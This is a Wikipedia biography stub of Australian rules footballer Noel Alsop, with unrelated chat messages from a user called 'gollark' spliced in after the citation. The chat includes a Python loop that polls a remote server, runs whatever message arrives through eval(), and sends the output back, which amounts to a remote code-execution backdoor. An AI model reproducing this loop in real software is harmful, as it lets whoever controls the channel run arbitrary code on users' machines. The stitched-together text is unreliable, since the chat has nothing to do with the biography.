Noel Alsop

Noel George Alsop (24 December 1914 – 25 February 1994) was an Australian rules footballer who played with Footscray in the Victorian Football League (VFL).[1]

Noel Alsop
Personal information
Full name Noel George Alsop
Date of birth (1914-12-24)24 December 1914
Place of birth Lorne, Victoria, Australia
Date of death 25 February 1994(1994-02-25) (aged 79)
Original team(s) Lorne
Height 178 cm (5 ft 10 in)
Weight 70 kg (154 lb)
Playing career1
Years Club Games (Goals)
1937–38 Footscray 7 (4)
1 Playing statistics correct to the end of 1938.
Sources: AFL Tables, AustralianFootball.com

Notes

  1. Holmesby, Russell; Main, Jim (2014). The Encyclopedia of AFL Footballers: every AFL/VFL player since 1897 (10th ed.). Seaford, Victoria: BAS Publishing. p. 18. ISBN 978-1-921496-32-5.
gollark: Hmm, idea: what if I make `potatOS.update` just send an event to `potatoupd` instead of actually running the update routines itself?
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
gollark: I was thinking about this, but I don't actually have all the hashes of all the disks in circulation.
gollark: It has some great new features now, like long polling mode.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.